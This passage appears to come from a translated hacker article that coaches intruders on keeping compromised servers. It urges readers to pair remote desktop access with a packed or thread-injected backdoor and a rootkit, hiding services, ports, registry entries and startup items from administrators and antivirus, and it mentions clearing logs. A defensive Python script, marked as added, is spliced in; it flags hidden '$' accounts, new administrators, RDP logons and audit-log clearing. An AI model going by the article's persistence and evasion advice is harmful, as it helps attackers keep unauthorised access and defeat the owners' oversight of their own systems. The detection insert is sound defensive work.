............
The above are just some low-end mistakes; I believe you won't make them again after reading this article. Now let's talk about safer ways to control bots after an intrusion. If I can say two or three things today that you will remember in future intrusions and security protection, I'll be very pleased!
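The three mistakes listed above (a new account added to Administrators, a `$`-suffixed name, logging on over 3389 with it) and the log deletion offered by functions like Cleanevent each leave a record in the Windows Security log, and reviewing those records is exactly how the administrator the author refuses to call stupid catches them. Below is an added example, not from the article, that reviews a list of simplified Security event records for account creation (event 4720), additions to the Administrators group (4732), remote interactive logons (4624 with logon type 10) and audit-log clearing (1102; the Win2000/XP/2003 systems in the article record the clear as event 517 instead). The records are constructed; the field names follow the Security log's data fields, but the dict shape and the names `review_events`, `looks_like_hidden_user` and `demo` are this example's own.

```python
"""Windows Security event review for the mistakes listed above.  Added
example, not from the article; the event records are constructed and the dict
shape is a simplification of the Security log's data fields."""

ACCOUNT_CREATED = 4720    # A user account was created
MEMBER_ADDED = 4732       # A member was added to a security-enabled local group
LOGON = 4624              # An account was successfully logged on
AUDIT_LOG_CLEARED = 1102  # The audit log was cleared (517 on pre-Vista systems)
RDP_LOGON_TYPE = 10       # RemoteInteractive, i.e. a terminal services (3389) logon

# Constructed sample events, oldest first.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Computer": "SRV01", "SubjectUserName": "Administrator",
     "TargetUserName": "backup$"},
    {"EventID": 4732, "Computer": "SRV01", "SubjectUserName": "Administrator",
     "TargetUserName": "Administrators", "MemberName": "SRV01\\backup$"},
    {"EventID": 4624, "Computer": "SRV01", "TargetUserName": "backup$",
     "LogonType": 10, "IpAddress": "203.0.113.9"},
    {"EventID": 4624, "Computer": "SRV01", "TargetUserName": "SRV01$",
     "LogonType": 3, "IpAddress": "-"},
    {"EventID": 1102, "Computer": "SRV01", "SubjectUserName": "backup$"},
]


def looks_like_hidden_user(name, computer):
    """A trailing '$' is normal only for the machine account (COMPUTERNAME$);
    on a user account it merely hides the name from `net user` output."""
    return name.endswith("$") and name.upper() != computer.upper() + "$"


def review_events(events, expected_admins=frozenset({"Administrator"})):
    """Return (severity, message) findings in event order."""
    findings = []
    for e in events:
        eid = e["EventID"]
        if eid == ACCOUNT_CREATED:
            hidden = looks_like_hidden_user(e["TargetUserName"], e["Computer"])
            msg = f"account created: {e['TargetUserName']} by {e['SubjectUserName']}"
            findings.append(("high" if hidden else "medium",
                             msg + (" (hidden-style name)" if hidden else "")))
        elif eid == MEMBER_ADDED and e["TargetUserName"] == "Administrators":
            member = e["MemberName"].split("\\")[-1]
            if member not in expected_admins:
                findings.append(("high", f"added to Administrators: {member}"))
        elif eid == LOGON and e.get("LogonType") == RDP_LOGON_TYPE:
            findings.append(("info", f"RDP logon: {e['TargetUserName']} from {e['IpAddress']}"))
        elif eid == AUDIT_LOG_CLEARED:
            # the clearing itself is logged as the first event of the new log
            findings.append(("critical", f"audit log cleared by {e['SubjectUserName']}"))
    return findings


def demo():
    return review_events(SAMPLE_EVENTS)


if __name__ == "__main__":
    for severity, message in demo():
        print(f"[{severity}] {message}")
```

The log-clear event survives precisely because it is written after the log is emptied, which is why forwarding Security events to a separate collector as they occur matters more than any single rule: the text's Cleanevent removes the local copy, not the forwarded one.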
In the general intrusion process, 3389 is of course the most popular control method. But why use only 3389 to control a server? How do you control it when someone turns 3389 off? So you need a backdoor. And why does my bot fly away soon after I install a classic backdoor? Note: no system administrator is an idiot! No matter how "black" you are, you only control the server remotely, while they have physical access to it! Can you unplug the network cable or format the hard disk to keep them from managing it?! Therefore, the concealment of backdoors is very important, and it is equally important that the administrator cannot discover the backdoor in the system!
A good backdoor can have a single function. Don't use your backdoor program to control bots frequently, and then it will be hard for your bots to fly away. The better way is:
3389/23 + extended backdoor + rootkit
This is the most classic backdoor combination so far, and its advantages are easy to see: when the other party notices a connection from an unknown IP, they will definitely check the system for problems and change the system password, and clearing your account is inevitable. The administrator then upgrades and checks the system vulnerabilities regularly, fixing the vulnerability we first used to get in. If there is no backdoor, it is very hard to get in again.
At this point the administrator will consider whether there is a backdoor in the system, using common anti-virus software and security programs to scan it and kill the backdoor immediately. So the concealment of the backdoor is very important here: killed at that moment, game over! Therefore you must choose backdoors that are hard to detect, or pack them; the backdoors described above are good choices, and thread-inserted ones are hard to kill.
On this basis, if they find that a program in the system is always connected to the network, or that a port is always connected to someone, the administrator will definitely find a way to kill that program, so even ordinary hidden backdoors get scanned and killed, which is what most friends worry about. This is where you need the rootkit!
If the service name, entry, port, registry value, startup item and program name are all hidden at the system level, then relying on common anti-virus programs and security tools to identify the backdoor programs in the system becomes very hard! This is the essence of a backdoor program: hiding! Such a function is definitely not implemented by one single backdoor program; a rootkit together with the series of backdoors described above is your best choice! Try more and you will surely find the advantages of this classic match! Step 4: if bots controlled this way are still lost, I recommend you stop playing!
